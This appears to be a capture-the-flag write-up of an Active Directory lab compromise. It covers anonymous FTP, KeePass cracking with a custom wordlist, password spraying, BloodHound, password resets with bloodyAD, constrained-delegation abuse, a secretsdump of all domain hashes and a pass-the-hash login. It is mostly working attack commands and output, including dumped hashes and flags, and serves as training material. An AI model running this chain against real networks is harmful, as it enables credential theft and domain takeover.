Enumeration
- Change
/etc/hostsand/etc/krb5.conf
Port 21
- Nmap scan showed that we have anonymous access to the ftp share.
- Let’s download all the files and see, what have find.
CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
Training Agenda
This file gave us an hint that only 7 attendees were there on the Weak Password session.
Resource Development
Let’s create a password list using this to crack the master password of the kdbx file
sudo vim wordlist.txt
Winter
Summer
Autumn
Fall
for i in $(cat wordlist.txt);do echo $i;echo ${i}2022;echo ${i}2023;echo ${i}2024;done > t
vim append_exclamation.rule
:
$!
hashcat --force t -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt
Password Cracking
john Shared_keepass --wordlist=../hashcat_words.txt
- We cracked the password to
Fall2024!. - We use this password to open the database file.
- We found some more users
| Username | Password |
|---|---|
| Timesheet | hMFS4I0Kj8Rcd62vqi5X |
| Payroll | cVkqz4bCM7kJRSNlgx2G |
| FTPUser | SguPZBKdRyxWzvXRWy6U |
| Administrator | Spdv41gg4BlBgSYIW1gF |
| Wordpress Panel | cn4KOEgsHqvKXPjEnSD9 |
| SQLGuest | zDPBpaF4FywlqIv11vii |
Port 1433
- We have a password for SQLGuest. We again ran the nmap scan and we found port 1433 open. I don’t know why it didn’t show up in our previous scan.
- mssqlclient login
- xp_dirtree hash not crackable
- no impersonate rights
- Created Users list using rid brute force
nxc mssql 10.10.91.240 -u SQLGuest -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute 2000
- Created user list and password sprayed using the password file.
Port 445
nxc smb 10.10.91.240 -u users_new.txt -p hashcat_words.txt
- Found a new user
redelegate.vl\Marie.Curie:Fall2024!
Port 389
nxc ldap 10.10.91.240 -u 'Marie.Curie' -p 'Fall2024!' --bloodhound -c All -d redelegate.vl --dns-server 10.10.91.240
-
Ryan.Cooper is the Domain admin
-
Marie.Curie can change the password of helen.frost
-
Helen.Frost can Ps remote and generic all rights over FS01.redelegate.vl
Constrained Delegation
bloodyAD --host '10.10.118.16' -d "redelegate.vl" -u "Marie.curie" -p 'Fall2024!' set password 'Helen.Frost' 'Password123!'
bloodyAD --host '10.10.118.16' -d "redelegate.vl" -u "Helen.Frost" -p 'Password123!' set password 'FS01$' 'Password123!'
- Helen Frost has Generic All on FS01
- We also have Seenabledelegation privilege
- we can change the password using generic all and the use the privilege to make fs01 for constrained delegation.
./bloodyAD.py -u 'Helen.Frost' -d 'redelegate.vl' -p 'Password123!' --host 'DC.redelegate.vl' add uac 'fs01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
dn: CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL
changetype: modify
add: msDS-AllowedToDelegateTo
msDS-AllowedToDelegateTo: ldap/dc.redelegate.vl
sudo apt-get install libsasl2-modules-gssapi-mit
kinit Helen.Frost
kvno ldap/dc.redelegate.vl
ldapmodify -H ldap://dc.redelegate.vl -Y GSSAPI -f modify.ldif
check if all is working
findDelegation.py 'redelegate.vl'/'fs01$:Password123!'
getST.py 'redelegate.vl/fs01$'@dc.redelegate.vl -spn ldap/dc.redelegate.vl -impersonate dc
secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.118.16
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
Helen.Frost:1106:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Michael.Pontiac:1107:aad3b435b51404eeaad3b435b51404ee:f37d004253f5f7525ef9840b43e5dad2:::
Mallory.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:980634f9aabfe13aec0111f64bda50c9:::
James.Dinkleberg:1109:aad3b435b51404eeaad3b435b51404ee:2716d39cc76e785bd445ca353714854d:::
Ryan.Cooper:1117:aad3b435b51404eeaad3b435b51404ee:062a12325a99a9da55f5070bf9c6fd2a:::
sql_svc:1119:aad3b435b51404eeaad3b435b51404ee:76a96946d9b465ec76a4b0b316785d6b:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:4867f8a87223e7d40393a7d9fc06f483:::
FS01$:1103:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:b9ba5bb3ea3310c94d87640cf63333b3b00fa5268cbd58e5ef898d286c9352de
Administrator:aes128-cts-hmac-sha1-96:1406919aa75dbe037f14a74e200442c5
Administrator:des-cbc-md5:cb6e8f6743527a89
krbtgt:aes256-cts-hmac-sha1-96:bff2ae7dfc202b4e7141a440c00b91308c45ea918b123d7e97cba1d712e6a435
krbtgt:aes128-cts-hmac-sha1-96:9690508b681c1ec11e6d772c7806bc71
krbtgt:des-cbc-md5:b3ce46a1fe86cb6b
Christine.Flanders:aes256-cts-hmac-sha1-96:ceb5854b48f9b203b4aa9a8e0ac4af28b9dc49274d54e9f9a801902ea73f17ba
Christine.Flanders:aes128-cts-hmac-sha1-96:e0fa68a3060b9543d04a6f84462829d9
Christine.Flanders:des-cbc-md5:8980267623df2637
Marie.Curie:aes256-cts-hmac-sha1-96:616e01b81238b801b99c284e7ebcc3d2d739046fca840634428f83c2eb18dbe8
Marie.Curie:aes128-cts-hmac-sha1-96:daa48c455d1bd700530a308fb4020289
Marie.Curie:des-cbc-md5:256889c8bf678910
Helen.Frost:aes256-cts-hmac-sha1-96:6df13a248e2ce1460004d7dcce5c4f8a30ea2c53e2c7d3ef712410f102cacf61
Helen.Frost:aes128-cts-hmac-sha1-96:884020e4824c0f50e596ba7a5d635634
Helen.Frost:des-cbc-md5:1a26f249a80d70df
Michael.Pontiac:aes256-cts-hmac-sha1-96:eca3a512ed24bb1c37cd2886ec933544b0d3cfa900e92b96d056632a6920d050
Michael.Pontiac:aes128-cts-hmac-sha1-96:53456b952411ac9f2f3e2adf433ab443
Michael.Pontiac:des-cbc-md5:833dc82fab76c229
Mallory.Roberts:aes256-cts-hmac-sha1-96:c9ad270adea8746d753e881692e9a75b2487a6402e02c0c915eb8ac6c2c7ab6a
Mallory.Roberts:aes128-cts-hmac-sha1-96:40f22695256d0c49089f7eda2d0d1266
Mallory.Roberts:des-cbc-md5:cb25a726ae198686
James.Dinkleberg:aes256-cts-hmac-sha1-96:c6cade4bc132681117d47dd422dadc66285677aac3e65b3519809447e119458b
James.Dinkleberg:aes128-cts-hmac-sha1-96:35b2ea5440889148eafb6bed06eea4c1
James.Dinkleberg:des-cbc-md5:83ef38dc8cd90da2
Ryan.Cooper:aes256-cts-hmac-sha1-96:d94424fd2a046689ef7ce295cf562dce516c81697d2caf8d03569cd02f753b5f
Ryan.Cooper:aes128-cts-hmac-sha1-96:48ea408634f503e90ffb404031dc6c98
Ryan.Cooper:des-cbc-md5:5b19084a8f640e75
sql_svc:aes256-cts-hmac-sha1-96:1decdb85de78f1ed266480b2f349615aad51e4dc866816f6ac61fa67be5bb598
sql_svc:aes128-cts-hmac-sha1-96:88f45d60fa053d62160e8ea8f1d0231e
sql_svc:des-cbc-md5:970d6115d3f4a43b
DC$:aes256-cts-hmac-sha1-96:3247dc574df4f4e2e82b09277c4284a0f467f5bb5f7c89df6ff0b5fe8f014c8b
DC$:aes128-cts-hmac-sha1-96:8d4768055e1f97421fdec78c047ed43e
DC$:des-cbc-md5:315bd35d8a7ca73b
FS01$:aes256-cts-hmac-sha1-96:c8142b9998787102dc1d596190bc28b16a1787f24e956d0a204077efc31117ba
FS01$:aes128-cts-hmac-sha1-96:48bcef06410264d5d28d91d7d8eb7cd1
FS01$:des-cbc-md5:1f8058fde68a58df
evil-winrm -i 10.10.118.16 -u Administrator -H a066fbf49e79f43fffc449810227e399
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{3e75af0ec54eb6c3da6989cb61b50598}
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> cat user.txt
VL{036daaf2f72c183cc4ec89824b40f076}